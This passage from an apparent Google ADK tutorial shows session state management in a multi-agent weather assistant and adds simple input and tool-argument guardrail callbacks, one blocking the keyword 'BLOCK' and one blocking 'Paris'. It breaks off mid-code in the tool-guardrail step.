demonstrate state management without interference from prior steps, we'll instantiate a new `InMemorySessionService`. We'll also create a session with an initial state defining the user's preferred temperature unit. ```python # @title 1. Initialize New Session Service and State # Import necessary session components from google.adk.sessions import InMemorySessionService # Create a NEW session service instance for this state demonstration session_service_stateful = InMemorySessionService() print("✅ New InMemorySessionService created for state demonstration.") # Define a NEW session ID for this part of the tutorial SESSION_ID_STATEFUL = "session_state_demo_001" USER_ID_STATEFUL = "user_state_demo" # Define initial state data - user prefers Celsius initially initial_state = { "user_preference_temperature_unit": "Celsius" } # Create the session, providing the initial state session_stateful = await session_service_stateful.create_session( app_name=APP_NAME, # Use the consistent app name user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL, state=initial_state # <<< Initialize state during creation ) print(f"✅ Session '{SESSION_ID_STATEFUL}' created for user '{USER_ID_STATEFUL}'.") # Verify the initial state was set correctly retrieved_session = await session_service_stateful.get_session(app_name=APP_NAME, user_id=USER_ID_STATEFUL, session_id = SESSION_ID_STATEFUL) print("\n--- Initial Session State ---") if retrieved_session: print(retrieved_session.state) else: print("Error: Could not retrieve session.") ``` ______________________________________________________________________ **2. Create State-Aware Weather Tool (`get_weather_stateful`)** Now, we create a new version of the weather tool. Its key feature is accepting `tool_context: ToolContext` which allows it to access `tool_context.state`. It will read the `user_preference_temperature_unit` and format the temperature accordingly. - **Key Concept: `ToolContext`** This object is the bridge allowing your tool logic to interact with the session's context, including reading and writing state variables. ADK injects it automatically if defined as the last parameter of your tool function. - **Best Practice:** When reading from state, use `dictionary.get('key', default_value)` to handle cases where the key might not exist yet, ensuring your tool doesn't crash. ```python from google.adk.tools.tool_context import ToolContext def get_weather_stateful(city: str, tool_context: ToolContext) -> dict: """Retrieves weather, converts temp unit based on session state.""" print(f"--- Tool: get_weather_stateful called for {city} ---") # --- Read preference from state --- preferred_unit = tool_context.state.get("user_preference_temperature_unit", "Celsius") # Default to Celsius print(f"--- Tool: Reading state 'user_preference_temperature_unit': {preferred_unit} ---") city_normalized = city.lower().replace(" ", "") # Mock weather data (always stored in Celsius internally) mock_weather_db = { "newyork": {"temp_c": 25, "condition": "sunny"}, "london": {"temp_c": 15, "condition": "cloudy"}, "tokyo": {"temp_c": 18, "condition": "light rain"}, } if city_normalized in mock_weather_db: data = mock_weather_db[city_normalized] temp_c = data["temp_c"] condition = data["condition"] # Format temperature based on state preference if preferred_unit == "Fahrenheit": temp_value = (temp_c * 9/5) + 32 # Calculate Fahrenheit temp_unit = "°F" else: # Default to Celsius temp_value = temp_c temp_unit = "°C" report = f"The weather in {city.capitalize()} is {condition} with a temperature of {temp_value:.0f}{temp_unit}." result = {"status": "success", "report": report} print(f"--- Tool: Generated report in {preferred_unit}. Result: {result} ---") # Example of writing back to state (optional for this tool) tool_context.state["last_city_checked_stateful"] = city print(f"--- Tool: Updated state 'last_city_checked_stateful': {city} ---") return result else: # Handle city not found error_msg = f"Sorry, I don't have weather information for '{city}'." print(f"--- Tool: City '{city}' not found. ---") return {"status": "error", "error_message": error_msg} print("✅ State-aware 'get_weather_stateful' tool defined.") ``` ______________________________________________________________________ **3. Redefine Sub-Agents and Update Root Agent** To ensure this step is self-contained and builds correctly, we first redefine the `greeting_agent` and `farewell_agent` exactly as they were in Step 3. Then, we define our new root agent (`weather_agent_v4_stateful`): - It uses the new `get_weather_stateful` tool. - It includes the greeting and farewell sub-agents for delegation. - **Crucially**, it sets `output_key="last_weather_report"` which automatically saves its final weather response to the session state. ```python # @title 3. Redefine Sub-Agents and Update Root Agent with output_key # Ensure necessary imports: Agent, LiteLlm, Runner from google.adk.agents import Agent from google.adk.models.lite_llm import LiteLlm from google.adk.runners import Runner # Ensure tools 'say_hello', 'say_goodbye' are defined (from Step 3) # Ensure model constants MODEL_GPT_4O, MODEL_GEMINI_2_5_FLASH etc. are defined # --- Redefine Greeting Agent (from Step 3) --- greeting_agent = None try: greeting_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="greeting_agent", instruction="You are the Greeting Agent. Your ONLY task is to provide a friendly greeting using the 'say_hello' tool. Do nothing else.", description="Handles simple greetings and hellos using the 'say_hello' tool.", tools=[say_hello], ) print(f"✅ Agent '{greeting_agent.name}' redefined.") except Exception as e: print(f"❌ Could not redefine Greeting agent. Error: {e}") # --- Redefine Farewell Agent (from Step 3) --- farewell_agent = None try: farewell_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="farewell_agent", instruction="You are the Farewell Agent. Your ONLY task is to provide a polite goodbye message using the 'say_goodbye' tool. Do not perform any other actions.", description="Handles simple farewells and goodbyes using the 'say_goodbye' tool.", tools=[say_goodbye], ) print(f"✅ Agent '{farewell_agent.name}' redefined.") except Exception as e: print(f"❌ Could not redefine Farewell agent. Error: {e}") # --- Define the Updated Root Agent --- root_agent_stateful = None runner_root_stateful = None # Initialize runner # Check prerequisites before creating the root agent if greeting_agent and farewell_agent and 'get_weather_stateful' in globals(): root_agent_model = MODEL_GEMINI_2_5_FLASH # Choose orchestration model root_agent_stateful = Agent( name="weather_agent_v4_stateful", # New version name model=root_agent_model, description="Main agent: Provides weather (state-aware unit), delegates greetings/farewells, saves report to state.", instruction="You are the main Weather Agent. Your job is to provide weather using 'get_weather_stateful'. " "The tool will format the temperature based on user preference stored in state. " "Delegate simple greetings to 'greeting_agent' and farewells to 'farewell_agent'. " "Handle only weather requests, greetings, and farewells.", tools=[get_weather_stateful], # Use the state-aware tool sub_agents=[greeting_agent, farewell_agent], # Include sub-agents output_key="last_weather_report" # <<< Auto-save agent's final weather response ) print(f"✅ Root Agent '{root_agent_stateful.name}' created using stateful tool and output_key.") # --- Create Runner for this Root Agent & NEW Session Service --- runner_root_stateful = Runner( agent=root_agent_stateful, app_name=APP_NAME, session_service=session_service_stateful # Use the NEW stateful session service ) print(f"✅ Runner created for stateful root agent '{runner_root_stateful.agent.name}' using stateful session service.") else: print("❌ Cannot create stateful root agent. Prerequisites missing.") if not greeting_agent: print(" - greeting_agent definition missing.") if not farewell_agent: print(" - farewell_agent definition missing.") if 'get_weather_stateful' not in globals(): print(" - get_weather_stateful tool missing.") ``` ______________________________________________________________________ **4. Interact and Test State Flow** Now, let's execute a conversation designed to test the state interactions using the `runner_root_stateful` (associated with our stateful agent and the `session_service_stateful`). We'll use the `call_agent_async` function defined earlier, ensuring we pass the correct runner, user ID (`USER_ID_STATEFUL`), and session ID (`SESSION_ID_STATEFUL`). The conversation flow will be: 1. **Check weather (London):** The `get_weather_stateful` tool should read the initial "Celsius" preference from the session state initialized in Section 1. The root agent's final response (the weather report in Celsius) should get saved to `state['last_weather_report']` via the `output_key` configuration. 1. **Manually update state:** We will *directly modify* the state stored within the `InMemorySessionService` instance (`session_service_stateful`). - **Why direct modification?** The `session_service.get_session()` method returns a *copy* of the session. Modifying that copy wouldn't affect the state used in subsequent agent runs. For this testing scenario with `InMemorySessionService`, we access the internal `sessions` dictionary to change the *actual* stored state value for `user_preference_temperature_unit` to "Fahrenheit". *Note: In real applications, state changes are typically triggered by tools or agent logic returning `EventActions(state_delta=...)`, not direct manual updates.* 1. **Check weather again (New York):** The `get_weather_stateful` tool should now read the updated "Fahrenheit" preference from the state and convert the temperature accordingly. The root agent's *new* response (weather in Fahrenheit) will overwrite the previous value in `state['last_weather_report']` due to the `output_key`. 1. **Greet the agent:** Verify that delegation to the `greeting_agent` still works correctly alongside the stateful operations. This interaction will become the *last* response saved by `output_key` in this specific sequence. 1. **Inspect final state:** After the conversation, we retrieve the session one last time (getting a copy) and print its state to confirm the `user_preference_temperature_unit` is indeed "Fahrenheit", observe the final value saved by `output_key` (which will be the greeting in this run), and see the `last_city_checked_stateful` value written by the tool. ```python # @title 4. Interact to Test State Flow and output_key import asyncio # Ensure asyncio is imported # Ensure the stateful runner (runner_root_stateful) is available from the previous cell # Ensure call_agent_async, USER_ID_STATEFUL, SESSION_ID_STATEFUL, APP_NAME are defined if 'runner_root_stateful' in globals() and runner_root_stateful: # Define the main async function for the stateful conversation logic. # The 'await' keywords INSIDE this function are necessary for async operations. async def run_stateful_conversation(): print("\n--- Testing State: Temp Unit Conversion & output_key ---") # 1. Check weather (Uses initial state: Celsius) print("--- Turn 1: Requesting weather in London (expect Celsius) ---") await call_agent_async(query= "What's the weather in London?", runner=runner_root_stateful, user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL ) # 2. Manually update state preference to Fahrenheit - DIRECTLY MODIFY STORAGE print("\n--- Manually Updating State: Setting unit to Fahrenheit ---") try: # Access the internal storage directly - THIS IS SPECIFIC TO InMemorySessionService for testing # NOTE: In production with persistent services (Database, VertexAI), you would # typically update state via agent actions or specific service APIs if available, # not by direct manipulation of internal storage. stored_session = session_service_stateful.sessions[APP_NAME][USER_ID_STATEFUL][SESSION_ID_STATEFUL] stored_session.state["user_preference_temperature_unit"] = "Fahrenheit" # Optional: You might want to update the timestamp as well if any logic depends on it # import time # stored_session.last_update_time = time.time() print(f"--- Stored session state updated. Current 'user_preference_temperature_unit': {stored_session.state.get('user_preference_temperature_unit', 'Not Set')} ---") # Added .get for safety except KeyError: print(f"--- Error: Could not retrieve session '{SESSION_ID_STATEFUL}' from internal storage for user '{USER_ID_STATEFUL}' in app '{APP_NAME}' to update state. Check IDs and if session was created. ---") except Exception as e: print(f"--- Error updating internal session state: {e} ---") # 3. Check weather again (Tool should now use Fahrenheit) # This will also update 'last_weather_report' via output_key print("\n--- Turn 2: Requesting weather in New York (expect Fahrenheit) ---") await call_agent_async(query= "Tell me the weather in New York.", runner=runner_root_stateful, user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL ) # 4. Test basic delegation (should still work) # This will update 'last_weather_report' again, overwriting the NY weather report print("\n--- Turn 3: Sending a greeting ---") await call_agent_async(query= "Hi!", runner=runner_root_stateful, user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL ) # --- Execute the `run_stateful_conversation` async function --- # Choose ONE of the methods below based on your environment. # METHOD 1: Direct await (Default for Notebooks/Async REPLs) # If your environment supports top-level await (like Colab/Jupyter notebooks), # it means an event loop is already running, so you can directly await the function. print("Attempting execution using 'await' (default for notebooks)...") await run_stateful_conversation() # METHOD 2: asyncio.run (For Standard Python Scripts [.py]) # If running this code as a standard Python script from your terminal, # the script context is synchronous. `asyncio.run()` is needed to # create and manage an event loop to execute your async function. # To use this method: # 1. Comment out the `await run_stateful_conversation()` line above. # 2. Uncomment the following block: """ import asyncio if __name__ == "__main__": # Ensures this runs only when script is executed directly print("Executing using 'asyncio.run()' (for standard Python scripts)...") try: # This creates an event loop, runs your async function, and closes the loop. asyncio.run(run_stateful_conversation()) except Exception as e: print(f"An error occurred: {e}") """ # --- Inspect final session state after the conversation --- # This block runs after either execution method completes. print("\n--- Inspecting Final Session State ---") final_session = await session_service_stateful.get_session(app_name=APP_NAME, user_id= USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL) if final_session: # Use .get() for safer access to potentially missing keys print(f"Final Preference: {final_session.state.get('user_preference_temperature_unit', 'Not Set')}") print(f"Final Last Weather Report (from output_key): {final_session.state.get('last_weather_report', 'Not Set')}") print(f"Final Last City Checked (by tool): {final_session.state.get('last_city_checked_stateful', 'Not Set')}") # Print full state for detailed view # print(f"Full State Dict: {final_session.state}") # For detailed view else: print("\n❌ Error: Could not retrieve final session state.") else: print("\n⚠️ Skipping state test conversation. Stateful root agent runner ('runner_root_stateful') is not available.") ``` ______________________________________________________________________ By reviewing the conversation flow and the final session state printout, you can confirm: - **State Read:** The weather tool (`get_weather_stateful`) correctly read `user_preference_temperature_unit` from state, initially using "Celsius" for London. - **State Update:** The direct modification successfully changed the stored preference to "Fahrenheit". - **State Read (Updated):** The tool subsequently read "Fahrenheit" when asked for New York's weather and performed the conversion. - **Tool State Write:** The tool successfully wrote the `last_city_checked_stateful` ("New York" after the second weather check) into the state via `tool_context.state`. - **Delegation:** The delegation to the `greeting_agent` for "Hi!" functioned correctly even after state modifications. - **`output_key`:** The `output_key="last_weather_report"` successfully saved the root agent's *final* response for *each turn* where the root agent was the one ultimately responding. In this sequence, the last response was the greeting ("Hello, there!"), so that overwrote the weather report in the state key. - **Final State:** The final check confirms the preference persisted as "Fahrenheit". You've now successfully integrated session state to personalize agent behavior using `ToolContext`, manually manipulated state for testing `InMemorySessionService`, and observed how `output_key` provides a simple mechanism for saving the agent's last response to state. This foundational understanding of state management is key as we proceed to implement safety guardrails using callbacks in the next steps. ______________________________________________________________________ ## Step 5: Adding Safety - Input Guardrail with `before_model_callback` Our agent team is becoming more capable, remembering preferences and using tools effectively. However, in real-world scenarios, we often need safety mechanisms to control the agent's behavior *before* potentially problematic requests even reach the core Large Language Model (LLM). ADK provides **Callbacks** – functions that allow you to hook into specific points in the agent's execution lifecycle. The `before_model_callback` is particularly useful for input safety. **What is `before_model_callback`?** - It's a Python function you define that ADK executes *just before* an agent sends its compiled request (including conversation history, instructions, and the latest user message) to the underlying LLM. - **Purpose:** Inspect the request, modify it if necessary, or block it entirely based on predefined rules. **Common Use Cases:** - **Input Validation/Filtering:** Check if user input meets criteria or contains disallowed content (like PII or keywords). - **Guardrails:** Prevent harmful, off-topic, or policy-violating requests from being processed by the LLM. - **Dynamic Prompt Modification:** Add timely information (e.g., from session state) to the LLM request context just before sending. **How it Works:** 1. Define a function accepting `callback_context: CallbackContext` and `llm_request: LlmRequest`. - `callback_context`: Provides access to agent info, session state (`callback_context.state`), etc. - `llm_request`: Contains the full payload intended for the LLM (`contents`, `config`). 1. Inside the function: - **Inspect:** Examine `llm_request.contents` (especially the last user message). - **Modify (Use Caution):** You *can* change parts of `llm_request`. - **Block (Guardrail):** Return an `LlmResponse` object. ADK will send this response back immediately, *skipping* the LLM call for that turn. - **Allow:** Return `None`. ADK proceeds to call the LLM with the (potentially modified) request. **In this step, we will:** 1. Define a `before_model_callback` function (`block_keyword_guardrail`) that checks the user's input for a specific keyword ("BLOCK"). 1. Update our stateful root agent (`weather_agent_v4_stateful` from Step 4) to use this callback. 1. Create a new runner associated with this updated agent but using the *same stateful session service* to maintain state continuity. 1. Test the guardrail by sending both normal and keyword-containing requests. ______________________________________________________________________ **1. Define the Guardrail Callback Function** This function will inspect the last user message within the `llm_request` content. If it finds "BLOCK" (case-insensitive), it constructs and returns an `LlmResponse` to block the flow; otherwise, it returns `None`. ```python # @title 1. Define the before_model_callback Guardrail # Ensure necessary imports are available from google.adk.agents.callback_context import CallbackContext from google.adk.models.llm_request import LlmRequest from google.adk.models.llm_response import LlmResponse from google.genai import types # For creating response content from typing import Optional def block_keyword_guardrail( callback_context: CallbackContext, llm_request: LlmRequest ) -> Optional[LlmResponse]: """ Inspects the latest user message for 'BLOCK'. If found, blocks the LLM call and returns a predefined LlmResponse. Otherwise, returns None to proceed. """ agent_name = callback_context.agent_name # Get the name of the agent whose model call is being intercepted print(f"--- Callback: block_keyword_guardrail running for agent: {agent_name} ---") # Extract the text from the latest user message in the request history last_user_message_text = "" if llm_request.contents: # Find the most recent message with role 'user' for content in reversed(llm_request.contents): if content.role == 'user' and content.parts: # Assuming text is in the first part for simplicity if content.parts[0].text: last_user_message_text = content.parts[0].text break # Found the last user message text print(f"--- Callback: Inspecting last user message: '{last_user_message_text[:100]}...' ---") # Log first 100 chars # --- Guardrail Logic --- keyword_to_block = "BLOCK" if keyword_to_block in last_user_message_text.upper(): # Case-insensitive check print(f"--- Callback: Found '{keyword_to_block}'. Blocking LLM call! ---") # Optionally, set a flag in state to record the block event callback_context.state["guardrail_block_keyword_triggered"] = True print(f"--- Callback: Set state 'guardrail_block_keyword_triggered': True ---") # Construct and return an LlmResponse to stop the flow and send this back instead return LlmResponse( content=types.Content( role="model", # Mimic a response from the agent's perspective parts=[types.Part(text=f"I cannot process this request because it contains the blocked keyword '{keyword_to_block}'.")], ) # Note: You could also set an error_message field here if needed ) else: # Keyword not found, allow the request to proceed to the LLM print(f"--- Callback: Keyword not found. Allowing LLM call for {agent_name}. ---") return None # Returning None signals ADK to continue normally print("✅ block_keyword_guardrail function defined.") ``` ______________________________________________________________________ **2. Update Root Agent to Use the Callback** We redefine the root agent, adding the `before_model_callback` parameter and pointing it to our new guardrail function. We'll give it a new version name for clarity. *Important:* We need to redefine the sub-agents (`greeting_agent`, `farewell_agent`) and the stateful tool (`get_weather_stateful`) within this context if they are not already available from previous steps, ensuring the root agent definition has access to all its components. ```python # @title 2. Update Root Agent with before_model_callback # --- Redefine Sub-Agents (Ensures they exist in this context) --- greeting_agent = None try: # Use a defined model constant greeting_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="greeting_agent", # Keep original name for consistency instruction="You are the Greeting Agent. Your ONLY task is to provide a friendly greeting using the 'say_hello' tool. Do nothing else.", description="Handles simple greetings and hellos using the 'say_hello' tool.", tools=[say_hello], ) print(f"✅ Sub-Agent '{greeting_agent.name}' redefined.") except Exception as e: print(f"❌ Could not redefine Greeting agent. Check Model/API Key ({greeting_agent.model}). Error: {e}") farewell_agent = None try: # Use a defined model constant farewell_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="farewell_agent", # Keep original name instruction="You are the Farewell Agent. Your ONLY task is to provide a polite goodbye message using the 'say_goodbye' tool. Do not perform any other actions.", description="Handles simple farewells and goodbyes using the 'say_goodbye' tool.", tools=[say_goodbye], ) print(f"✅ Sub-Agent '{farewell_agent.name}' redefined.") except Exception as e: print(f"❌ Could not redefine Farewell agent. Check Model/API Key ({farewell_agent.model}). Error: {e}") # --- Define the Root Agent with the Callback --- root_agent_model_guardrail = None runner_root_model_guardrail = None # Check all components before proceeding if greeting_agent and farewell_agent and 'get_weather_stateful' in globals() and 'block_keyword_guardrail' in globals(): # Use a defined model constant root_agent_model = MODEL_GEMINI_2_5_FLASH root_agent_model_guardrail = Agent( name="weather_agent_v5_model_guardrail", # New version name for clarity model=root_agent_model, description="Main agent: Handles weather, delegates greetings/farewells, includes input keyword guardrail.", instruction="You are the main Weather Agent. Provide weather using 'get_weather_stateful'. " "Delegate simple greetings to 'greeting_agent' and farewells to 'farewell_agent'. " "Handle only weather requests, greetings, and farewells.", tools=[get_weather_stateful], sub_agents=[greeting_agent, farewell_agent], # Reference the redefined sub-agents output_key="last_weather_report", # Keep output_key from Step 4 before_model_callback=block_keyword_guardrail # <<< Assign the guardrail callback ) print(f"✅ Root Agent '{root_agent_model_guardrail.name}' created with before_model_callback.") # --- Create Runner for this Agent, Using SAME Stateful Session Service --- # Ensure session_service_stateful exists from Step 4 if 'session_service_stateful' in globals(): runner_root_model_guardrail = Runner( agent=root_agent_model_guardrail, app_name=APP_NAME, # Use consistent APP_NAME session_service=session_service_stateful # <<< Use the service from Step 4 ) print(f"✅ Runner created for guardrail agent '{runner_root_model_guardrail.agent.name}', using stateful session service.") else: print("❌ Cannot create runner. 'session_service_stateful' from Step 4 is missing.") else: print("❌ Cannot create root agent with model guardrail. One or more prerequisites are missing or failed initialization:") if not greeting_agent: print(" - Greeting Agent") if not farewell_agent: print(" - Farewell Agent") if 'get_weather_stateful' not in globals(): print(" - 'get_weather_stateful' tool") if 'block_keyword_guardrail' not in globals(): print(" - 'block_keyword_guardrail' callback") ``` ______________________________________________________________________ **3. Interact to Test the Guardrail** Let's test the guardrail's behavior. We'll use the *same session* (`SESSION_ID_STATEFUL`) as in Step 4 to show that state persists across these changes. 1. Send a normal weather request (should pass the guardrail and execute). 1. Send a request containing "BLOCK" (should be intercepted by the callback). 1. Send a greeting (should pass the root agent's guardrail, be delegated, and execute normally). ```python # @title 3. Interact to Test the Model Input Guardrail import asyncio # Ensure asyncio is imported # Ensure the runner for the guardrail agent is available if 'runner_root_model_guardrail' in globals() and runner_root_model_guardrail: # Define the main async function for the guardrail test conversation. # The 'await' keywords INSIDE this function are necessary for async operations. async def run_guardrail_test_conversation(): print("\n--- Testing Model Input Guardrail ---") # Use the runner for the agent with the callback and the existing stateful session ID # Define a helper lambda for cleaner interaction calls interaction_func = lambda query: call_agent_async(query, runner_root_model_guardrail, USER_ID_STATEFUL, # Use existing user ID SESSION_ID_STATEFUL # Use existing session ID ) # 1. Normal request (Callback allows, should use Fahrenheit from previous state change) print("--- Turn 1: Requesting weather in London (expect allowed, Fahrenheit) ---") await interaction_func("What is the weather in London?") # 2. Request containing the blocked keyword (Callback intercepts) print("\n--- Turn 2: Requesting with blocked keyword (expect blocked) ---") await interaction_func("BLOCK the request for weather in Tokyo") # Callback should catch "BLOCK" # 3. Normal greeting (Callback allows root agent, delegation happens) print("\n--- Turn 3: Sending a greeting (expect allowed) ---") await interaction_func("Hello again") # --- Execute the `run_guardrail_test_conversation` async function --- # Choose ONE of the methods below based on your environment. # METHOD 1: Direct await (Default for Notebooks/Async REPLs) # If your environment supports top-level await (like Colab/Jupyter notebooks), # it means an event loop is already running, so you can directly await the function. print("Attempting execution using 'await' (default for notebooks)...") await run_guardrail_test_conversation() # METHOD 2: asyncio.run (For Standard Python Scripts [.py]) # If running this code as a standard Python script from your terminal, # the script context is synchronous. `asyncio.run()` is needed to # create and manage an event loop to execute your async function. # To use this method: # 1. Comment out the `await run_guardrail_test_conversation()` line above. # 2. Uncomment the following block: """ import asyncio if __name__ == "__main__": # Ensures this runs only when script is executed directly print("Executing using 'asyncio.run()' (for standard Python scripts)...") try: # This creates an event loop, runs your async function, and closes the loop. asyncio.run(run_guardrail_test_conversation()) except Exception as e: print(f"An error occurred: {e}") """ # --- Inspect final session state after the conversation --- # This block runs after either execution method completes. # Optional: Check state for the trigger flag set by the callback print("\n--- Inspecting Final Session State (After Guardrail Test) ---") # Use the session service instance associated with this stateful session final_session = await session_service_stateful.get_session(app_name=APP_NAME, user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL) if final_session: # Use .get() for safer access print(f"Guardrail Triggered Flag: {final_session.state.get('guardrail_block_keyword_triggered', 'Not Set (or False)')}") print(f"Last Weather Report: {final_session.state.get('last_weather_report', 'Not Set')}") # Should be London weather if successful print(f"Temperature Unit: {final_session.state.get('user_preference_temperature_unit', 'Not Set')}") # Should be Fahrenheit # print(f"Full State Dict: {final_session.state}") # For detailed view else: print("\n❌ Error: Could not retrieve final session state.") else: print("\n⚠️ Skipping model guardrail test. Runner ('runner_root_model_guardrail') is not available.") ``` ______________________________________________________________________ Observe the execution flow: 1. **London Weather:** The callback runs for `weather_agent_v5_model_guardrail`, inspects the message, prints "Keyword not found. Allowing LLM call.", and returns `None`. The agent proceeds, calls the `get_weather_stateful` tool (which uses the "Fahrenheit" preference from Step 4's state change), and returns the weather. This response updates `last_weather_report` via `output_key`. 1. **BLOCK Request:** The callback runs again for `weather_agent_v5_model_guardrail`, inspects the message, finds "BLOCK", prints "Blocking LLM call!", sets the state flag, and returns the predefined `LlmResponse`. The agent's underlying LLM is *never called* for this turn. The user sees the callback's blocking message. 1. **Hello Again:** The callback runs for `weather_agent_v5_model_guardrail`, allows the request. The root agent then delegates to `greeting_agent`. *Note: The `before_model_callback` defined on the root agent does NOT automatically apply to sub-agents.* The `greeting_agent` proceeds normally, calls its `say_hello` tool, and returns the greeting. You have successfully implemented an input safety layer! The `before_model_callback` provides a powerful mechanism to enforce rules and control agent behavior *before* expensive or potentially risky LLM calls are made. Next, we'll apply a similar concept to add guardrails around tool usage itself. ## Step 6: Adding Safety - Tool Argument Guardrail (`before_tool_callback`) In Step 5, we added a guardrail to inspect and potentially block user input *before* it reached the LLM. Now, we'll add another layer of control *after* the LLM has decided to use a tool but *before* that tool actually executes. This is useful for validating the *arguments* the LLM wants to pass to the tool. ADK provides the `before_tool_callback` for this precise purpose. **What is `before_tool_callback`?** - It's a Python function executed just *before* a specific tool function runs, after the LLM has requested its use and decided on the arguments. - **Purpose:** Validate tool arguments, prevent tool execution based on specific inputs, modify arguments dynamically, or enforce resource usage policies. **Common Use Cases:** - **Argument Validation:** Check if arguments provided by the LLM are valid, within allowed ranges, or conform to expected formats. - **Resource Protection:** Prevent tools from being called with inputs that might be costly, access restricted data, or cause unwanted side effects (e.g., blocking API calls for certain parameters). - **Dynamic Argument Modification:** Adjust arguments based on session state or other contextual information before the tool runs. **How it Works:** 1. Define a function accepting `tool: BaseTool`, `args: Dict[str, Any]`, and `tool_context: ToolContext`. - `tool`: The tool object about to be called (inspect `tool.name`). - `args`: The dictionary of arguments the LLM generated for the tool. - `tool_context`: Provides access to session state (`tool_context.state`), agent info, etc. 1. Inside the function: - **Inspect:** Examine the `tool.name` and the `args` dictionary. - **Modify:** Change values within the `args` dictionary *directly*. If you return `None`, the tool runs with these modified args. - **Block/Override (Guardrail):** Return a **dictionary**. ADK treats this dictionary as the *result* of the tool call, completely *skipping* the execution of the original tool function. The dictionary should ideally match the expected return format of the tool it's blocking. - **Allow:** Return `None`. ADK proceeds to execute the actual tool function with the (potentially modified) arguments. **In this step, we will:** 1. Define a `before_tool_callback` function (`block_paris_tool_guardrail`) that specifically checks if the `get_weather_stateful` tool is called with the city "Paris". 1. If "Paris" is detected, the callback will block the tool and return a custom error dictionary. 1. Update our root agent (`weather_agent_v6_tool_guardrail`) to include *both* the `before_model_callback` and this new `before_tool_callback`. 1. Create a new runner for this agent, using the same stateful session service. 1. Test the flow by requesting weather for allowed cities and the blocked city ("Paris"). ______________________________________________________________________ **1. Define the Tool Guardrail Callback Function** This function targets the `get_weather_stateful` tool. It checks the `city` argument. If it's "Paris", it returns an error dictionary that looks like the tool's own error response. Otherwise, it allows the tool to run by returning `None`. ```python # @title 1. Define the before_tool_callback Guardrail # Ensure necessary imports are available from google.adk.tools.base_tool import BaseTool from google.adk.tools.tool_context import ToolContext from typing import Optional, Dict, Any # For type hints def block_paris_tool_guardrail( tool: BaseTool, args: Dict[str, Any], tool_context: ToolContext ) -> Optional[Dict]: """ Checks if 'get_weather_stateful' is called for 'Paris'. If so, blocks the tool execution and returns a specific error dictionary. Otherwise, allows the tool call to proceed by returning None. """ tool_name = tool.name agent_name = tool_context.agent_name # Agent attempting the tool call print(f"--- Callback: block_paris_tool_guardrail running for tool '{tool_name}' in agent '{agent_name}' ---") print(f"--- Callback: Inspecting args: {args} ---") # --- Guardrail Logic --- target_tool_name = "get_weather_stateful" # Match the function name used by FunctionTool blocked_city = "paris" # Check if it's the correct tool and the city argument matches the blocked city if tool_name == target_tool_name: city_argument = args.get("city", "") # Safely get the 'city' argument if city_argument and city_argument.lower() == blocked_city: print(f"--- Callback: Detected blocked city '{city_argument}'. Blocking tool execution! ---") # Optionally update state tool_context.state["guardrail_tool_block_triggered"] = True print(f"--- Callback: Set state 'guardrail_tool_block_triggered': True ---") # Return a dictionary matching the tool's expected output format for errors # This dictionary becomes the tool's result, skipping the actual tool run. return { "status": "error", "error_message": f"Policy restriction: Weather checks for '{city_argument.capitalize()}' are currently disabled by a tool guardrail." } else: print(f"--- Callback: City '{city_argument}' is allowed for tool '{tool_name}'. ---") else: print(f"--- Callback: Tool '{tool_name}' is not the target tool. Allowing. ---") # If the checks above didn't return a dictionary, allow the tool to execute print(f"--- Callback: Allowing tool '{tool_name}' to proceed. ---") return None # Returning None allows the actual tool function to run print("✅ block_paris_tool_guardrail function defined.") ``` ______________________________________________________________________ **2. Update Root Agent to Use Both Callbacks** We redefine the root agent again (`weather_agent_v6_tool_guardrail`), this time adding the `before_tool_callback` parameter alongside the `before_model_callback` from Step 5. *Self-Contained Execution Note:* Similar to Step 5, ensure all prerequisites (sub-agents, tools, `before_model_callback`) are defined or available in the execution context before defining this agent. ```python # @title 2. Update Root Agent with BOTH Callbacks (Self-Contained) # --- Ensure Prerequisites are Defined --- # (Include or ensure execution of definitions for: Agent, LiteLlm, Runner, ToolContext, # MODEL constants, say_hello, say_goodbye, greeting_agent, farewell_agent, # get_weather_stateful, block_keyword_guardrail, block_paris_tool_guardrail) # --- Redefine Sub-Agents (Ensures they exist in this context) --- greeting_agent = None try: # Use a defined model constant greeting_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="greeting_agent", # Keep original name for consistency instruction="You are the Greeting Agent. Your ONLY task is to provide a friendly greeting using the 'say_hello' tool. Do nothing else.", description="Handles simple greetings and hellos using the 'say_hello' tool.", tools=[say_hello], ) print(f"✅ Sub-Agent '{greeting_agent.name}' redefined.") except Exception as e: print(f"❌ Could not redefine Greeting agent. Check Model/API Key ({greeting_agent.model}). Error: {e}") farewell_agent = None try: # Use a defined model constant farewell_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="farewell_agent", # Keep original name instruction="You are the Farewell Agent. Your ONLY task is to provide a polite goodbye message using the 'say_goodbye' tool. Do not perform any other actions.", description="Handles simple farewells and goodbyes using the 'say_goodbye' tool.", tools=[say_goodbye], ) print(f"✅ Sub-Agent '{farewell_agent.name}' redefined.") except Exception as e: print(f"❌ Could not redefine Farewell agent. Check Model/API Key ({farewell_agent.model}). Error: {e}") # --- Define the Root Agent with Both Callbacks --- root_agent_tool_guardrail = None runner_root_tool_guardrail = None if ('greeting_agent' in globals() and greeting_agent and 'farewell_agent' in globals() and farewell_agent and 'get_weather_stateful' in globals() and 'block_keyword_guardrail' in globals() and 'block_paris_tool_guardrail' in globals()): root_agent_model = MODEL_GEMINI_2_5_FLASH root_agent_tool_guardrail = Agent( name="weather_agent_v6_tool_guardrail", # New version name model=root_agent_model, description="Main agent: Handles weather, delegates, includes input AND tool guardrails.", instruction="You are the main Weather Agent. Provide weather using 'get_weather_stateful'. " "Delegate greetings to 'greeting_agent' and farewells to 'farewell_agent'. " "Handle only weather, greetings, and farewells.", tools=[get_weather_stateful], sub_agents=[greeting_agent, farewell_agent], output_key="last_weather_report", before_model_callback=block_keyword_guardrail, # Keep model guardrail before_tool_callback=block_paris_tool_guardrail # <<< Add tool guardrail ) print(f"✅ Root Agent '{root_agent_tool_guardrail.name}' created with BOTH callbacks.") # --- Create Runner, Using 